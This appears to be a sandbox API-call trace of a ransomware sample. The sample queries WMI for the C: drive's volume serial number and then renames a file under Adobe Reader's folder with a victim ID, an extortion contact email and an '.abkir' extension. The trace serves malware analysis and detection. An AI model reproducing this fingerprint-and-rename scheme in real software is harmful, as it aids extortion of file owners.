WbemDefPath:IWbemPath:GetInfo (in: This=0x6025ae0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ae0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0151.313] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.313] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0151.313] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0151.313] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0151.313] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.313] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6024a90) returned 0x0 [0151.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024a90, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0151.314] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024a90, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6025b50) returned 0x0 [0151.314] WbemDefPath:IUnknown:Release (This=0x6024a90) returned 0x0 [0151.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6025b50) returned 0x0 [0151.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0151.314] WbemDefPath:IUnknown:AddRef (This=0x6025b50) returned 0x3 [0151.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0151.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0151.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ccb08) returned 0x0 [0151.314] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.314] WbemDefPath:IUnknown:Release (This=0x66ccb08) returned 0x3 [0151.314] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0151.314] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0151.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0151.315] WbemDefPath:IUnknown:Release (This=0x6025b50) returned 0x2 [0151.315] WbemDefPath:IUnknown:Release (This=0x6025b50) returned 0x1 [0151.315] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0151.315] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0151.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025b50, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6025b50) returned 0x0 [0151.315] WbemDefPath:IUnknown:AddRef (This=0x6025b50) returned 0x3 [0151.315] WbemDefPath:IUnknown:Release (This=0x6025b50) returned 0x2 [0151.315] WbemDefPath:IWbemPath:SetText (This=0x6025b50, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0151.315] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025b50, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0151.315] WbemDefPath:IWbemPath:GetText (in: This=0x6025b50, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0151.315] WbemDefPath:IWbemPath:GetText (in: This=0x6025b50, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.315] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0151.315] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0151.315] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0151.315] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.316] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6027288) returned 0x0 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6027288, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0151.316] WbemLocator:IClassFactory:CreateInstance (in: This=0x6027288, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6024aa0) returned 0x0 [0151.316] WbemLocator:IUnknown:Release (This=0x6027288) returned 0x0 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6024aa0) returned 0x0 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0151.316] WbemLocator:IUnknown:AddRef (This=0x6024aa0) returned 0x3 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0151.316] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0151.316] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0151.316] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0151.317] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x2 [0151.317] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x1 [0151.317] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0151.317] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0151.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6024aa0) returned 0x0 [0151.317] WbemLocator:IUnknown:AddRef (This=0x6024aa0) returned 0x3 [0151.317] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x2 [0151.317] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025b50, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0151.317] WbemDefPath:IWbemPath:GetText (in: This=0x6025b50, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0151.317] WbemDefPath:IWbemPath:GetText (in: This=0x6025b50, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.317] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6024ab0) returned 0x0 [0151.317] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024ab0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6010d04) returned 0x0 [0153.150] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d04, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b4f4) returned 0x0 [0153.150] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b4f4, pProxy=0x6010d04, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0153.150] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x1 [0153.150] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d04, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b514) returned 0x0 [0153.150] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d04, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b4f4) returned 0x0 [0153.150] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b4f4, pProxy=0x6010d04, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0153.150] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x2 [0153.150] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0153.150] CoTaskMemFree (pv=0xbd4a68) [0153.150] WbemLocator:IUnknown:Release (This=0x6024ab0) returned 0x0 [0153.150] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b514) returned 0x0 [0153.151] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0153.152] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0153.154] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0153.154] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0153.155] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0153.158] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b474) returned 0x0 [0153.158] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b474, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0153.158] WbemLocator:IUnknown:Release (This=0xb5b474) returned 0x3 [0153.158] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0153.159] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0153.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b4fc) returned 0x0 [0153.159] WbemLocator:IRpcOptions:Query (in: This=0xb5b4fc, pPrx=0xb5b514, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0153.159] WbemLocator:IUnknown:Release (This=0xb5b4fc) returned 0x3 [0153.159] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0153.159] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0153.159] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0153.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6010d04) returned 0x0 [0153.159] WbemLocator:IUnknown:AddRef (This=0x6010d04) returned 0x4 [0153.159] WbemLocator:IUnknown:Release (This=0x6010d04) returned 0x3 [0153.159] WbemLocator:IUnknown:Release (This=0x6010d04) returned 0x2 [0153.159] SysStringLen (param_1=0x0) returned 0x0 [0153.159] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ae0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0153.159] WbemDefPath:IWbemPath:GetText (in: This=0x6025ae0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0153.159] WbemDefPath:IWbemPath:GetText (in: This=0x6025ae0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.159] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0153.159] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0153.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b514) returned 0x0 [0153.159] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x3 [0153.159] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0153.160] WbemDefPath:IWbemPath:GetText (in: This=0x6025ae0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0153.160] WbemDefPath:IWbemPath:GetText (in: This=0x6025ae0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.160] IWbemServices:GetObject (in: This=0x6010d04, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028978, ppCallResult=0x0) returned 0x0 [0153.772] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025b50, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0153.773] WbemDefPath:IWbemPath:GetText (in: This=0x6025b50, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0153.773] WbemDefPath:IWbemPath:GetText (in: This=0x6025b50, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.773] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e0ae8*=0, plFlavor=0x36e0aec*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e0ae8*=8, plFlavor=0x36e0aec*=0) returned 0x0 [0153.773] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.773] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.773] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e0ae8*=8, plFlavor=0x36e0aec*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e0ae8*=8, plFlavor=0x36e0aec*=0) returned 0x0 [0153.773] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.773] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.773] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0153.773] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0153.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0153.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x17f42680, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0153.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0153.774] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 